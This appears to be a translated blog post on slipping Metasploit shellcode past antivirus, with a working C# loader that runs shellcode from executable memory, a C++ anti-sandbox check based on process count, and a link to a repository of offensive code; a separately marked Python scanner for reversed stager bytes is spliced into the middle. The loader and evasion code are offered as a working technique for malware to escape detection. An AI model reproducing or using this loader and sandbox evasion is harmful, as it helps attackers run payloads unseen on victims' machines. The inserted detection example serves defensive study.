This post describes using reversed shellcode to get past antivirus. First, generate a plain msf payload and see how it fares:
VirusTotal result:
Now let's write a basic loader in C#. The code is as follows:
```csharp
using System;
using System.Runtime.InteropServices;

class Program
{
    // P/Invoke declarations for the three Win32 calls the loader needs.
    [DllImport("kernel32")]
    private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

    static void Main()
    {
        IntPtr threadHandle = IntPtr.Zero;
        UInt32 threadId = 0;
        IntPtr parameter = IntPtr.Zero;
        // Placeholder; the real msf payload bytes go here.
        byte[] shellcode = new byte[1] { 0xfc };

        // Allocate an RWX buffer, copy the bytes in, run them on a new thread and wait for it.
        UInt32 codeAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(shellcode, 0, (IntPtr)(codeAddr), shellcode.Length);
        threadHandle = CreateThread(0, 0, codeAddr, parameter, 0, ref threadId);
        WaitForSingleObject(threadHandle, 0xFFFFFFFF);
        return;
    }
}
```
That is, it uses P/Invoke to call the Win32 API.
VirusTotal result:
Next, we reverse the shellcode and load it that way:
While we're at it, add a bit of anti-sandbox logic, for example a check on the number of running processes. A C++ demo:
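A detection-side example, added here and not part of the original post: a small Python scanner that pulls `new byte[] { ... }` literals out of C# source and checks each one in both forward and reversed byte order against a pair of commonly seen Metasploit stager prologues, so a loader that stores its shellcode reversed (as described above) still matches. The signature bytes and the sample source below are my own constructed values.

```python
from __future__ import annotations
import re

# Commonly seen Metasploit stager prologues (constructed list for this example):
#   x86: cld; call ...          -> fc e8
#   x64: cld; and rsp, -16      -> fc 48 83 e4 f0
KNOWN_PROLOGUES = {
    "msf x86 stager prologue": bytes.fromhex("fce8"),
    "msf x64 stager prologue": bytes.fromhex("fc4883e4f0"),
}

# Matches C# literals of the form: new byte[N] { 0x.., 0x.., ... }
BYTE_ARRAY_RE = re.compile(r"new\s+byte\s*\[\s*\d*\s*\]\s*\{([^}]*)\}", re.S)


def extract_byte_arrays(source: str) -> list:
    """Return every byte-array literal found in C# source text as bytes."""
    arrays = []
    for m in BYTE_ARRAY_RE.finditer(source):
        hexes = re.findall(r"0x([0-9a-fA-F]{1,2})", m.group(1))
        if hexes:
            arrays.append(bytes(int(h, 16) for h in hexes))
    return arrays


def classify(buf: bytes) -> list:
    """Return (orientation, label) hits, testing the buffer forward and reversed."""
    hits = []
    for orient, view in (("forward", buf), ("reversed", buf[::-1])):
        for label, sig in KNOWN_PROLOGUES.items():
            if view.startswith(sig):
                hits.append((orient, label))
    return hits


def scan_source(source: str) -> list:
    """Scan C# source and report each embedded array that matches a known prologue."""
    findings = []
    for idx, arr in enumerate(extract_byte_arrays(source)):
        for orient, label in classify(arr):
            findings.append({"array": idx, "length": len(arr),
                             "orientation": orient, "signature": label})
    return findings


# Constructed sample: the first array is a reversed x64 prologue plus NOP filler
# (not a real payload); the second is harmless data.
SAMPLE_CS = """
byte[] shellcode = new byte[8] { 0x90, 0x90, 0x90, 0xf0, 0xe4, 0x83, 0x48, 0xfc };
byte[] other = new byte[3] { 0x41, 0x42, 0x43 };
"""
```

Running `scan_source(SAMPLE_CS)` flags only the first array, in reversed orientation, which is exactly the case a forward-only prologue check misses.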
```cpp
#include <windows.h>
#include <tlhelp32.h>
#include <cstdlib>

void AntiSimulation()
{
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (INVALID_HANDLE_VALUE == hSnapshot)
    {
        return;
    }
    PROCESSENTRY32 pe = { sizeof(pe) };
    int procnum = 0;
    // Count every process visible in the snapshot.
    for (BOOL ret = Process32First(hSnapshot, &pe); ret; ret = Process32Next(hSnapshot, &pe))
    {
        procnum++;
    }
    CloseHandle(hSnapshot); // the original leaked this handle
    if (procnum <= 40) // Fewer than ~40 processes? The most we've seen an emulator simulate is Windows Defender at 39.
    {
        exit(1);
    }
}
```
This part is a matter of taste; add whatever checks you like. Here is the result:
The final code has been uploaded to GitHub (with the anti-sandbox check removed): https://github.com/lengjibo/OffenSiveCSharp/tree/master/bypassAV8